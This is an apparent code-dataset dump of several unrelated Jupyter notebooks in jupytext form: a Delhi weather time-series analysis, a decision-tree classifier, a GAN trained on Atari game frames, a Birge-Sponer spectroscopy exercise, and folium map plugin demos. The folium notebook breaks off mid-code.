code stringlengths 38 801k | repo_path stringlengths 6 263 |
|---|---|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Delhi Daily Weather Forecast
# In this notebook we analyze a time series DataFrame for Delhi daily weather forecast for the years $2013$ to $2017$. We specifically deal with:
# - Getting the data
# - Time based indexing
# - Visualizing time series data
# - Seasonality
# - Frequencies
# - Resampling
# - Rolling windows
# - Correlation between humidity and temperature
#
# This analysis is adapted from [DataQuest Tutorial](https://www.dataquest.io/blog/tutorial-time-series-analysis-with-pandas/).
#
#
# ### 1. Getting the data
# This time series data set is obtained from [Kaggle Data Repository](https://www.kaggle.com/sumanthvrao/daily-climate-time-series-data?select=DailyDelhiClimateTrain.csv 'Title') with the following parameters:
# * `meantemp` averaged out from multiple 3 hour intervals in a day (measured in `degree celsius`).
# * `humidity` value for the day (units are `grams of water vapor per cubic meter volume of air`).
# * `wind_speed` (measured in `kmph`).
# * `meanpressure` reading of weather (measured in `atm`).
#
# The following packages were used:
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
import statsmodels.api as sm
from pandas import *
from sklearn.linear_model import LinearRegression as lr
# Reading a CSV data file
delhi_daily_weather = pd.read_csv(f'../data/DailyDelhiClimate.csv')
delhi_daily_weather.shape
delhi_daily_weather.head(3)
delhi_daily_weather.tail(3)
# +
# Handling missing data for the year 2017
# -
delhi_daily_weather.dtypes
# We see something is wrong with the data type of the `date` column, we convert it using `to_datetime()` function.
delhi_daily_weather['date'] = pd.to_datetime(delhi_daily_weather['date'])
delhi_daily_weather.dtypes
# Now everything looks great. Next, we set the `index` to be the `date` column.
delhi_daily_weather = delhi_daily_weather.set_index('date')
delhi_daily_weather.tail(3)
delhi_daily_weather.index
# Add columns with year, month, and weekday name
delhi_daily_weather['Year'] = delhi_daily_weather.index.year
delhi_daily_weather['Month'] = delhi_daily_weather.index.month
delhi_daily_weather['Weekday Name'] = delhi_daily_weather.index.day_name()
# Display a random sampling of 5 rows
delhi_daily_weather.sample(5, random_state=0)
# ### 2. Time based indexing
#
# This allows us to view our data on a certain interval of time depending on our needs.
# Viewing one row for the selected day
delhi_daily_weather.loc['2015-01-11']
# Slice of days
delhi_daily_weather.loc['2014-01-20':'2014-01-22']
# Partial-string indexing for the month of March 2016
delhi_daily_weather.loc['2016-03']
# The entry of `meanpressure` for `2016-03-28` is an outlier by simply looking at the trend of the data for that column. This problem might be caused by incorrect recording of the data. In order to deal with this problem, we simply take the average of four entries i.e., each two values before and after the outlier.
delhi_daily_weather.iloc[1182,3] = (delhi_daily_weather.iloc[1180,3]+
delhi_daily_weather.iloc[1181,3]+
delhi_daily_weather.iloc[1183,3]+
delhi_daily_weather.iloc[1184,3])/4
delhi_daily_weather.loc[['2016-03-28']]
# The new value has been added to our DataFrame which makes the data relevant. However, there is an alternative way to what we have done above but ut gives out a warning. See the code below.
# +
# delhi_daily_weather.loc['2016-03-28']['meanpressure'] = (delhi_daily_weather.loc['2016-03-26']['meanpressure']+
# delhi_daily_weather.loc['2016-03-27']['meanpressure']+
# delhi_daily_weather.loc['2016-03-29']['meanpressure']+
# delhi_daily_weather.loc['2016-03-30']['meanpressure'])/4
# + [markdown] slideshow={"slide_type": "slide"}
# ### 3. Visualizing time series data
#
# Considering the table above, `meanpressure` doesn't provide us with significant information to analyze our data. We may decide to drop it and work with the rest of the columns.
# -
# Use seaborn style defaults and set the default figure size
sns.set(rc={'figure.figsize':(14, 7)})
# +
# Consider the meantemp, humidity and wind_speed time series
cols_plot = ['meantemp', 'humidity', 'wind_speed']
axes = delhi_daily_weather[cols_plot].plot(marker='o', figsize=(15,10),alpha=0.5, linestyle='None', subplots=True)
ylabels = ['Degree Celsius ($^\circ C$)','Vapour per cubic meter','kmph']
count = 0
for ax in axes:
ax.set_ylabel(ylabels[count])
count = count + 1
# -
# Considering the pattern of the figure shown above, it is evident that temperature and wind speed are inversely proportional to the amount of humidity. In the sense that, when they increase simultaneously the amount of humidity decreases. However, the wind speed seems not to vary too much with little outliers having speed of more than $20\,kmph$.
#
# In light of the previous figure, let's consider temperature parameter and provide more details about it.
delhi_daily_weather['meantemp'].plot(linewidth=0.7);
plt.title('2013 - 2017 Mean Temperature')
plt.ylabel('Degree Celsius ($^\circ C$)')
# The figure above shows that, some periods of the year (possibly, summer time i.e., May to October) experience temperature higher than $30^\circ C$ while others (winter time i.e., December and January) have temperature below $15^\circ C$.
#
# Let's focus on the year of 2015.
# Monthly temperature in 2015
ax = delhi_daily_weather.loc['2015', 'meantemp'].plot()
ax.set_ylabel('Degree Celsius ($^\circ C$)')
plt.title('2015 Mean Temperature')
# As we guessed earlier, the temperature rises beyond $30^\circ C$ between May and October, and it goes below $15^\circ C$ in January and December.
#
# Let's now visualize our data for January and February 2015 with `x-ticks` represented in a nice format.
fig, ax = plt.subplots()
ax.plot(delhi_daily_weather.loc['2015-01':'2015-02', 'meantemp'], marker='o', linestyle='-')
ax.set_ylabel('Celsius Degrees ($^\circ C$)')
ax.set_title('Jan-Feb 2017 Mean Temperature')
# Set x-axis major ticks to weekly interval, on Mondays
ax.xaxis.set_major_locator(mdates.WeekdayLocator(byweekday=mdates.MONDAY))
# Format x-tick labels as 3-letter month name and day number
ax.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'));
# Now we have vertical gridlines and nicely formatted tick labels on each Monday, so we can easily tell which days are weekdays and weekends.
# ### 4. Seasonality
# We concentrate on yearly temperature, humidity and wind speed variations, and study their relationships.
fig, axes = plt.subplots(3, 1, figsize=(11, 10), sharex=True)
for name, ax in zip(['meantemp', 'humidity', 'wind_speed'], axes):
sns.boxplot(data=delhi_daily_weather, x='Month', y=name, ax=ax)
ax.set_ylabel('Kmph')
ax.set_title(name)
# Remove the automatic x-axis label from all but the bottom subplot
if ax != axes[-1]:
ax.set_xlabel('')
# These box plots confirm the yearly seasonality that we saw in earlier plots.
#
# Our next step for seasonality is based on weekly temperature, humidity and wind speed.
sns.boxplot(data=delhi_daily_weather, x='Weekday Name', y='meantemp')
plt.title('Weekly mean temperature')
# The figure above depicts that, the temperature doesn't change much on weekly basis as it lies between $19^\circ C$ and $32^\circ C$.
sns.boxplot(data=delhi_daily_weather, x='Weekday Name', y='humidity')
plt.title('Weekly humidity')
# Again there is not much variation in humidity level with some exceptionals on Tuesdays, Wednesdays and Thursdays.
sns.boxplot(data=delhi_daily_weather, x='Weekday Name', y='wind_speed')
plt.title('Weekly wind speed')
# ### 5. Frequencies
delhi_daily_weather.index
# To select an arbitrary sequence of date/time values from a pandas time series,
# we need to use a DatetimeIndex, rather than simply a list of date/time strings
times_sample = pd.to_datetime(['2013-02-03', '2013-02-06', '2013-02-08'])
# Select the specified dates and just the meantemp column
meantemp_sample = delhi_daily_weather.loc[times_sample, ['meantemp']].copy()
meantemp_sample
# Convert the data to daily frequency, without filling any missings
meantemp_freq = meantemp_sample.asfreq('D')
# Create a column with missings forward filled
meantemp_freq['meantemp - Forward Fill'] = meantemp_sample.asfreq('D', method='ffill')
meantemp_freq
# ### 6. Resampling
# Using `resample()` method and apply aggregation methods `mean()`, `mode()`, `median()`, etc
# Specify the data columns we want to include (i.e. exclude Year, Month, Weekday Name)
data_columns = ['meantemp', 'humidity', 'wind_speed']
# Resample to weekly frequency, aggregating with mean
delhi_weekly_mean = delhi_daily_weather[data_columns].resample('W').mean()
delhi_weekly_mean.head(3)
delhi_weekly_mean.tail(3)
# Comparing the rows after resampling the data on weekly mean
print(delhi_daily_weather.shape[0])
print(delhi_weekly_mean.shape[0])
# Let’s plot the daily and weekly mean temperature time series together over a single six-month period to compare them.
# Start and end of the date range to extract
start, end = '2015-01', '2015-06'
# Plot daily and weekly resampled time series together
fig, ax = plt.subplots()
ax.plot(delhi_daily_weather.loc[start:end, 'meantemp'],
marker='.', linestyle='-', linewidth=0.5, label='Daily')
ax.plot(delhi_weekly_mean.loc[start:end, 'meantemp'],
marker='o', markersize=8, linestyle='-', label='Weekly Mean Resample')
ax.set_ylabel('Mean Temperature ($^\circ C$)')
ax.legend();
# We can see that the weekly mean time series is smoother than the daily time series because higher frequency variability has been averaged out in the resampling.
# Compute the maximum monthly of data
delhi_monthly_max = delhi_daily_weather[data_columns].resample('M').max()
delhi_monthly_max.head(3)
delhi_monthly_max.tail(3)
# Let’s explore this further by resampling to annual frequency and computing the ratio of `meantemp` to `humidity` for each year.
# Compute the maximum annual temperature
delhi_annual_max = delhi_daily_weather[data_columns].resample('A').max()
# The default index of the resampled DataFrame is the last day of each year,
# ('2013-12-31', '2014-12-31', etc.) so to make life easier, set the index
# to the year component
delhi_annual_max = delhi_annual_max.set_index(delhi_annual_max.index.year)
delhi_annual_max.index.name = 'Year'
# Compute the ratio of meantemp to humidity
delhi_annual_max['Ratio'] = delhi_annual_max['meantemp'] / delhi_annual_max['humidity']
delhi_annual_max.head(5)
# Finally, let’s plot the ratio of `meantemp` and `humidity` as a bar chart.
ax = delhi_annual_max.loc[2013:, 'Ratio'].plot.bar(color='C0')
ax.set_ylabel('Fraction')
ax.set_ylim(0, .5)
ax.set_title('Humidity temperature ratio')
plt.xticks(rotation=0);
# The figure above tells us that, the ratio lies between $0.35$ and $0.45$ for the first four years and it is far below for $2017$ because there are not enough data for that year.
# ### 7. Rolling Windows
# Let’s use the `rolling()` method to compute the 7-day rolling mean of our daily data.
# Compute the centered 7-day rolling mean
delhi_7d = delhi_daily_weather[data_columns].rolling(7, center=True).mean()
delhi_7d.head(10)
# To visualize the differences between rolling mean and resampling, let’s update our earlier plot of January - June 2015 mean temperature to include the 7-day rolling mean along with the weekly mean resampled time series and the original daily data.
# Start and end of the date range to extract
start, end = '2015-01', '2015-06'
# Plot daily, weekly resampled, and 7-day rolling mean time series together
fig, ax = plt.subplots()
ax.plot(delhi_daily_weather.loc[start:end, 'meantemp'],
marker='.', linestyle='-', linewidth=0.5, label='Daily')
ax.plot(delhi_weekly_mean.loc[start:end, 'meantemp'],
marker='o', markersize=8, linestyle='-', label='Weekly Mean Resample')
ax.plot(delhi_7d.loc[start:end, 'meantemp'],
marker='.', linestyle='-', label='7-d Rolling Mean')
ax.set_ylabel('Mean Temperature ($^\circ C$)')
ax.legend();
# We can see that data points in the rolling mean time series have the same spacing as the daily data, but the curve is smoother because higher frequency variability has been averaged out. In the rolling mean time series, the peaks and troughs tend to align closely with the peaks and troughs of the daily time series. In contrast, the peaks and troughs in the weekly resampled time series are less closely aligned with the daily time series, since the resampled time series is at a coarser granularity.
# We’ve already computed 7-day rolling means, so now let’s compute the 365-day rolling mean of our weather data.
# The min_periods=360 argument accounts for a few isolated missing days
delhi_365d = delhi_daily_weather[data_columns].rolling(window=365, center=True, min_periods=360).mean()
delhi_365d.tail(400)
# Let’s plot the 7-day and 365-day rolling mean temperature, along with the daily time series.
# Plot daily, 7-day rolling mean, and 365-day rolling mean time series
fig, ax = plt.subplots()
ax.plot(delhi_daily_weather['meantemp'], marker='.', markersize=4, color='0.6',
linestyle='None', label='Daily')
ax.plot(delhi_7d['meantemp'], linewidth=2, label='7-d Rolling Mean')
ax.plot(delhi_365d['meantemp'], color='0.2', linewidth=3,
label='Trend (365-d Rolling Mean)')
# Set x-ticks to yearly interval and add legend and labels
ax.xaxis.set_major_locator(mdates.YearLocator())
ax.legend()
ax.set_xlabel('Year')
ax.set_ylabel('Mean Temperature ($^\circ C$)')
ax.set_title('Trends in Tempeature');
# Annual trend of humidity.
# Plot 365-day rolling mean time series of humidity
fig, ax = plt.subplots()
for nm in ['humidity']:
ax.plot(delhi_365d[nm], label=nm)
# Set x-ticks to yearly interval, adjust y-axis limits, add legend and labels
ax.xaxis.set_major_locator(mdates.YearLocator())
ax.set_ylim(58, 67)
ax.legend()
ax.set_ylabel('Vapor per cubic meter')
ax.set_title('Trends in humidity (365-d Rolling Means)');
# ### 8. Correlation between humidity and temperature
# +
# # Fitting the data for temperature and humidity
# temperature = np.array(delhi_daily_weather['meantemp'])
# humidity = np.array(delhi_daily_weather['humidity']).reshape(-1,1)
# model = lr().fit(humidity, temperature)
# #Coefficient of determination r_sq
# print('r_sq = ', model.score(humidity, temperature),'\n')
# #Intercept
# print('Intercept = ', model.intercept_,'\n')
# #Slope
# print('Slope = ', model.coef_,'\n\n')
# pred_temp = model.predict(humidity)
# The rate of increase of humidity lead to decrease in temperature by the rate of $-0.25$. Let's visualize this hypothesis.
# -
y = delhi_daily_weather['meantemp']
x = delhi_daily_weather[['humidity','wind_speed','meanpressure']]
x = sm.add_constant(x)
results = sm.OLS(y,x).fit()
results.summary()
| scripts/delhi_weather_analysis.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
#### Importing libraries
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
# +
#### loading dataSet as pandas dataFrame
data=pd.read_excel('./Data/PURCHASE.xlsx')\
#### Let’s take a look at the top five rows using the DataFrame’s head() method
data.head()
# -
#### Converting Categorical column to numeric
#### Instead of using OneHot encoder or Label encoder simply use replace method
data.replace({'NO':0, 'YES':1}, inplace=True)
data.head()
# +
#### Creating dependent and independent variables
# independent variables
x=data.drop(['PURCHASE'],axis=1)
# dependent variable
y=data['PURCHASE']
# +
#### Decision Tree Classifier Model instantiate and fit
import sklearn.tree as tree
model_DTC=tree.DecisionTreeClassifier(criterion='entropy')
model_DTC.fit(x,y)
#### Ploting Decision Tree
from sklearn.tree import plot_tree, export_text
features = x.columns
plt.figure(figsize=(10,10))
plot_tree(model_DTC, feature_names=features,filled = True)
plt.show()
# +
#### Defining function for Classification Results
from sklearn.metrics import accuracy_score
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
def classification_results(model, xR, yR, ON):
#### Predicting train
yR_predict = model.predict(xR)
#### Calculating accuracy score for train
acc = accuracy_score(yR, yR_predict)
print('\033[1m' + ON + ':' +'\033[0m')
print(f'Accuracy : {acc}')
print('-'*55)
#### Classification report for train
CR = classification_report(yR, yR_predict)
print("classification report : \n", CR)
print('-'*55)
#### Confusion matrix for train
CM = confusion_matrix(yR, yR_predict)
print("Confusion matrix :\n", CM)
sns.heatmap(CM, center = True, annot = True, fmt = 'g')
plt.ylabel('Actual label')
plt.xlabel('Predicted label')
return(yR_predict, acc)
# -
#### Classification Results on train
y_train_predict_dtc, acc_train_dtc = classification_results(model_DTC, x, y, 'TRAIN')
#### Creating Test DataSet
data_test=pd.DataFrame({'Holiday':[1,0,0,1,1],'Discount':[0,0,1,0,1],'Free Delivery':[0,0,0,1,1]})
data_test
#### Making Predictions on test DataSet
data_test['Purchase']=model_DTC.predict(data_test)
data_test.replace({0:'No',1:'Yes'})
| Supervised/Classification/DecisionTree_Classifier/Purchase_DT_Classifier.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="fJuus3m7uy7O" colab_type="text"
# <h1> Generative Adversarial Networks using the OpenAI Gym and PyTorch </h1>
# <div>
# <p> <b> <NAME> 2020. </b>
# <p> Before running this notebook, make sure you have proper access to a GPU as this notebook will completely depend upon GPU for its workload deployments.</p>
# </div>
# + id="_j2c-90CcClg" colab_type="code" outputId="2430d180-b2ca-4421-a857-288cce7c6092" colab={"base_uri": "https://localhost:8080/", "height": 894}
# !pip install opencv-python
# !pip install --upgrade tensorflow
# !pip install --upgrade grpcio
import tensorflow as tf
import random
import argparse
import cv2
import torch
import torch.nn as nn
import torch.optim as optim
import torchvision.utils as vutils
import gym
import gym.spaces
import gym.logger as logstat
logstat.set_level(gym.logger.INFO)
import numpy as np
from gym.wrappers import Monitor
# !pip install pyvirtualdisplay
# !apt-get install python-opengl ffmpeg xvfb
# + id="EKvLidEQdOc_" colab_type="code" colab={}
LATENT_VECTOR_SIZE=100
DISCR_FILTERS = 64
GENER_FILTERS = 64
BATCH_SIZE = 16
# + id="-9VDAkO0ezTM" colab_type="code" colab={}
IMAGE_SIZE = 64
LEARNING_RATE = 0.0001
REPORT_EVERY_ITER = 100
SAVE_IMAGE_EVERY_ITER=1000
# + id="SqkdqvYdfANa" colab_type="code" colab={}
class InputWrapper(gym.ObservationWrapper):
'''
Preprocessing of Input images pipeline
'''
def __init__(self, *args):
super(InputWrapper, self).__init__(*args)
assert isinstance(self.observation_space, gym.spaces.Box)
old_space = self.observation_space
self.observation_space = gym.spaces.Box(self.observation(old_space.low), self.observation(old_space.high), dtype= np.float32)
def observation(self, observation):
#resizing the input image
new_obs = cv2.resize(observation, (IMAGE_SIZE, IMAGE_SIZE))
#transforming the input shape (200, 100, 3) -> (3, 200, 100)
new_obs = np.moveaxis(new_obs, 2, 0)
return new_obs.astype(np.float32)
# + id="sNG_r8tZh2dg" colab_type="code" colab={}
class Discriminator(nn.Module):
def __init__(self, input_shape):
super(Discriminator, self).__init__()
# this pipe converges image into the single number using a series of Convulutions, Relu, Batch Normalizations and at last using the Sigmoid function.
self.conv_pipe = nn.Sequential(
nn.Conv2d(in_channels=input_shape[0], out_channels=DISCR_FILTERS,
kernel_size=4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(in_channels=DISCR_FILTERS, out_channels=DISCR_FILTERS*2,
kernel_size=4, stride=2, padding=1),
nn.BatchNorm2d(DISCR_FILTERS*2),
nn.ReLU(),
nn.Conv2d(in_channels=DISCR_FILTERS * 2, out_channels=DISCR_FILTERS * 4,
kernel_size=4, stride=2, padding=1),
nn.BatchNorm2d(DISCR_FILTERS * 4),
nn.ReLU(),
nn.Conv2d(in_channels=DISCR_FILTERS * 4, out_channels=DISCR_FILTERS * 8,
kernel_size=4, stride=2, padding=1),
nn.BatchNorm2d(DISCR_FILTERS * 8),
nn.ReLU(),
nn.Conv2d(in_channels=DISCR_FILTERS * 8, out_channels=1,
kernel_size=4, stride=1, padding=0),
nn.Sigmoid()
)
def forward(self, x):
conv_out = self.conv_pipe(x)
return conv_out.view(-1, 1).squeeze(dim=1)
# + id="hrH62z3XjuKx" colab_type="code" colab={}
class Generator(nn.Module):
def __init__(self, output_shape):
super(Generator, self).__init__()
self.pipe = nn.Sequential(
nn.ConvTranspose2d(in_channels=LATENT_VECTOR_SIZE,out_channels=GENER_FILTERS*8, kernel_size=4, stride=1, padding=0),
nn.BatchNorm2d(GENER_FILTERS*8),
nn.ReLU(),
nn.ConvTranspose2d(in_channels=GENER_FILTERS*8, out_channels=GENER_FILTERS*4, kernel_size=4, stride=2, padding=1),
nn.BatchNorm2d(GENER_FILTERS*4),
nn.ReLU(),
nn.ConvTranspose2d(in_channels=GENER_FILTERS*4, out_channels=GENER_FILTERS*2, kernel_size=4, stride=2, padding=1),
nn.BatchNorm2d(GENER_FILTERS*2),
nn.ReLU(),
nn.ConvTranspose2d(in_channels=GENER_FILTERS*2, out_channels=GENER_FILTERS, kernel_size=4, stride=2, padding=1),
nn.BatchNorm2d(GENER_FILTERS),
nn.ReLU(),
nn.ConvTranspose2d(in_channels=GENER_FILTERS, out_channels=output_shape[0], kernel_size=4, stride=2, padding=1),
nn.Tanh()
)
def forward(self, x):
return self.pipe(x)
# + id="2l6TRRMwkcEa" colab_type="code" colab={}
def iterate_batches(envs, batch_size=BATCH_SIZE):
batch = [e.reset() for e in envs]
env_gen = iter(lambda: random.choice(envs), None)
while True:
e = next(env_gen)
obs, reward, is_done, info = e.step(e.action_space.sample())
if np.mean(obs) > 0.01:
batch.append(obs)
if len(batch) == batch_size:
#normalizing between -1 to 1
batch_np = np.array(batch, dtype=np.float32)* 2.0/255.0 - 1.0
yield torch.tensor(batch_np)
batch.clear()
if is_done:
e.reset()
# + id="PV5eVpCFVO1-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 118} outputId="01582358-0cc5-4d92-81cb-45e61185d7ce"
from tqdm import tqdm
if __name__ == "__main__":
device = torch.device("cuda")
envs = [InputWrapper(gym.make(name)) for name in ('Breakout-v0', 'AirRaid-v0', 'Pong-v0')]
input_shape = envs[0].observation_space.shape
net_discr = Discriminator(input_shape=input_shape).to(device)
net_gener = Generator(output_shape=input_shape).to(device)
objective = nn.BCELoss()
gen_optimizer = optim.Adam(params=net_gener.parameters(), lr=LEARNING_RATE, betas=(0.5, 0.999))
dis_optimizer = optim.Adam(params=net_discr.parameters(), lr=LEARNING_RATE, betas=(0.5, 0.999))
gen_losses = []
dis_losses = []
iter_no = 0
true_labels_v = torch.ones(BATCH_SIZE, dtype=torch.float32, device=device)
fake_labels_v = torch.zeros(BATCH_SIZE, dtype=torch.float32, device=device)
pbar = tqdm(total=7000)
for batch_v in iterate_batches(envs):
gen_input_v = torch.FloatTensor(BATCH_SIZE, LATENT_VECTOR_SIZE, 1, 1).normal_(0, 1).to(device)
batch_v = batch_v.to(device)
gen_output_v = net_gener(gen_input_v)
# train discriminator
dis_optimizer.zero_grad()
dis_output_true_v = net_discr(batch_v)
dis_output_fake_v = net_discr(gen_output_v.detach())
dis_loss = objective(dis_output_true_v, true_labels_v) + objective(dis_output_fake_v, fake_labels_v)
dis_loss.backward()
dis_optimizer.step()
dis_losses.append(dis_loss.item())
# train generator
gen_optimizer.zero_grad()
dis_output_v = net_discr(gen_output_v)
gen_loss_v = objective(dis_output_v, true_labels_v)
gen_loss_v.backward()
gen_optimizer.step()
gen_losses.append(gen_loss_v.item())
iter_no += 1
pbar.update(1)
if iter_no == 7000:
pbar.close()
print("Final Result: ")
print("Iteration : %d, Discriminator Loss: %f, Generator Loss: %f " % (iter_no, dis_loss.item(), gen_loss_v.item()))
break;
| Reinforcement_Learning_With_Swastik_Episode_2.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Computing Birge-Sponer plots from vibrational transitions
# <a rel="license" href="http://creativecommons.org/licenses/by/4.0/"><img alt="Creative Commons Licence" style="border-width:0" src="https://i.creativecommons.org/l/by/4.0/88x31.png" title='This work is licensed under a Creative Commons Attribution 4.0 International License.' align="right"/></a>
#
# This is an interactive notebook to compute Birge-Sponer plots from vibrational data and estimate upper bounds for dissociation energies based on vibrational frequency data.
#
# Author: Dr <NAME> [@ppxasjsm](https://github.com/ppxasjsm)
# - to run the currently highlighted cell by holding <kbd>⇧ Shift</kbd> and press <kbd>⏎ Enter</kbd>;
# ## Adding data
# You can add a set of vibrational transition wave numbers and their corresponding vibrational quantum numbers in the two cells below. An example for HgH would look like this:
# Observed transitions: 1203.7, 965.6, 632.4, 172
# Vibrational quantum numbers: 0.5, 1.5, 2.5, 3.5
# %pylab inline
import Helper
data = Helper.data_input()
display(data)
# The data will be read by the program and then plotted against each other, when you execute the next cell.
Helper.plot_birge_sponer(data)
# #### Extrapolating the data
# Now in order to be able to compute the dissociation constant we need to extrapolate the line until it crosses the y-axis at x=0 and the x axis at y=0.
# The plot below has done this automatically. The Helper module uses a linear regression fit called `linregress` as implemented in `scipy`.
Helper.plot_extrapolated_birge_sponer(data)
# #### Computing the area under the curve
# You can see, that the dashed orange line is the extrapolated curve to where the extrapolation is required.
# You could now try and read the numbers of the graph, or just compute the area under the curve, which in this case is a right-angle triangle.
#
# Remember the area of a triangle is given by:
# $A = \frac{1}{2}ab$,
# where a, in this case, is the side of the y-axis and b is the side of the x-axis.
# Again there is a convenient helper function that will take the data from the curve and compute the area, and conveniently display this result.
Helper.compute_area_under_graph(data)
# **Check your understanding**:
# How is the dissociation energy computed from the wave number that is estimated by the area under the curve?
# Try it yourself and see if you get the same answer as below.
Helper.compute_dissociation_energy(data)
# ***Some other data***:
#
a = np.array([2191,2064,1941,1821,1705,1591,1479,1368,1257,1145,1033,918,800,677,548,411])
v = []
V = 0.5
for i in range(len(a)):
v.append(V)
V = V+1
v
| Birge-Sponer_Diagrams.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import os
import folium
print(folium.__version__)
# -
# # Examples of plugins usage in folium
from folium import plugins
# In this notebook we show a few illustrations of folium's plugin extensions.
#
# This is a development notebook
# ## ScrollZoomToggler
# Adds a button to enable/disable zoom scrolling.
# +
m = folium.Map([45, 3], zoom_start=4)
plugins.ScrollZoomToggler().add_to(m)
m.save(os.path.join('results', 'Plugins_0.html'))
m
# -
# ## MarkerCluster
# Adds a MarkerCluster layer on the map.
# +
import numpy as np
N = 100
data = np.array(
[
np.random.uniform(low=35, high=60, size=N), # Random latitudes in Europe.
np.random.uniform(low=-12, high=30, size=N), # Random longitudes in Europe.
range(N), # Popups texts are simple numbers.
]
).T
m = folium.Map([45, 3], zoom_start=4)
plugins.MarkerCluster(data).add_to(m)
m.save(os.path.join('results', 'Plugins_1.html'))
m
# -
# ## Terminator
# +
m = folium.Map([45, 3], zoom_start=1)
plugins.Terminator().add_to(m)
m.save(os.path.join('results', 'Plugins_2.html'))
m
# -
# ## Leaflet.boatmarker
# +
m = folium.Map([30, 0], zoom_start=3)
plugins.BoatMarker(
location=(34, -43),
heading=45,
wind_heading=150,
wind_speed=45,
color='#8f8'
).add_to(m)
plugins.BoatMarker(
location=(46, -30),
heading=-20,
wind_heading=46,
wind_speed=25,
color='#88f'
).add_to(m)
m.save(os.path.join('results', 'Plugins_3.html'))
m
# -
# ## Leaflet.BeautifyIcon
# +
from folium.plugins.beautify_icon import BeautifyIcon
from folium import Marker
m = folium.Map([45.5, -122], zoom_start=3)
icon_plane = BeautifyIcon(
icon='plane',
border_color='#b3334f',
text_color='#b3334f',
icon_shape='triangle')
icon_number = BeautifyIcon(
border_color='#00ABDC',
text_color='#00ABDC',
number=10,
inner_icon_style='margin-top:0;')
Marker(
location=[46, -122],
popup='Portland, OR',
icon=icon_plane
).add_to(m)
Marker(
location=[50, -122],
popup='Portland, OR',
icon=icon_number
).add_to(m)
m.save(os.path.join('results', 'Plugins_4.html'))
m
# -
# ## Fullscreen
# +
m = folium.Map(location=[41.9, -97.3], zoom_start=4)
plugins.Fullscreen(
position='topright',
title='Expand me',
title_cancel='Exit me',
force_separate_button=True).add_to(m)
m.save(os.path.join('results', 'Plugins_5.html'))
m
# -
# ## Timestamped GeoJSON
# +
from folium import plugins
m = folium.Map(
location=[35.68159659061569, 139.76451516151428],
zoom_start=16
)
# Lon, Lat order.
lines = [
{
'coordinates': [
[139.76451516151428, 35.68159659061569],
[139.75964426994324, 35.682590062684206],
],
'dates': [
'2017-06-02T00:00:00',
'2017-06-02T00:10:00'
],
'color': 'red'
},
{
'coordinates': [
[139.75964426994324, 35.682590062684206],
[139.7575843334198, 35.679505030038506],
],
'dates': [
'2017-06-02T00:10:00',
'2017-06-02T00:20:00'
],
'color': 'blue'
},
{
'coordinates': [
[139.7575843334198, 35.679505030038506],
[139.76337790489197, 35.678040905014065],
],
'dates': [
'2017-06-02T00:20:00',
'2017-06-02T00:30:00'
],
'color': 'green',
'weight': 15,
},
{
'coordinates': [
[139.76337790489197, 35.678040905014065],
[139.76451516151428, 35.68159659061569],
],
'dates': [
'2017-06-02T00:30:00',
'2017-06-02T00:40:00'
],
'color': '#FFFFFF',
},
]
features = [
{
'type': 'Feature',
'geometry': {
'type': 'LineString',
'coordinates': line['coordinates'],
},
'properties': {
'times': line['dates'],
'style': {
'color': line['color'],
'weight': line['weight'] if 'weight' in line else 5
}
}
}
for line in lines
]
plugins.TimestampedGeoJson({
'type': 'FeatureCollection',
'features': features,
}, period='PT1M', add_last_point=True).add_to(m)
m.save(os.path.join('results', 'Plugins_6.html'))
m
# +
from folium import plugins
points = [
{"time":'2017-06-02',
"popup":"<h1>address1</h1>",
"coordinates":[-2.548828, 51.467697]},
{"time":'2017-07-02',
"popup":"<h2 style=\"color:blue;\">address2<h2>",
"coordinates":[-0.087891, 51.536086]},
{"time":'2017-08-02',
"popup":"<h2 style=\"color:orange;\">address3<h2>",
"coordinates":[-6.240234, 53.383328]},
{"time":'2017-09-02',
"popup":"<h2 style=\"color:green;\">address4<h2>",
"coordinates":[-1.40625, 60.261617]},
{"time":'2017-10-02',
"popup":"""<table style=\"width:100%\">
<tr>
<th>Firstname</th>
<th>Lastname</th>
<th>Age</th>
</tr>
<tr>
<td>Jill</td>
<td>Smith</td>
<td>50</td>
</tr>
<tr>
<td>Eve</td>
<td>Jackson</td>
<td>94</td>
</tr>
</table>""",
"coordinates":[-1.516113, 53.800651]}
]
features = [{
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": point['coordinates'],
},
"properties": {
"time": point['time'],
"popup": point['popup'],
"id":"house",
'icon':'marker',
'iconstyle':{
'iconUrl': 'http://downloadicons.net/sites/default/files/small-house-with-a-chimney-icon-70053.png',
'iconSize': [20, 20]
}
}
} for point in points]
features.append({
'type': 'Feature',
'geometry': {
'type': 'LineString',
'coordinates': [[-2.548828, 51.467697], [-0.087891, 51.536086],
[-6.240234, 53.383328], [-1.40625, 60.261617],
[-1.516113, 53.800651]
],
},
'properties': {
'popup':'Current address',
'times': ['2017-06-02', '2017-07-02',
'2017-08-02', '2017-09-02',
'2017-10-02'],
'icon':'circle',
'iconstyle':{
'fillColor': 'green',
'fillOpacity': 0.6,
'stroke': 'false',
'radius': 13
},
'style': {'weight':0
},
'id':'man'
}
})
m = folium.Map(
location=[56.096555, -3.64746],
tiles = 'cartodbpositron',
zoom_start=5
)
plugins.TimestampedGeoJson(
{
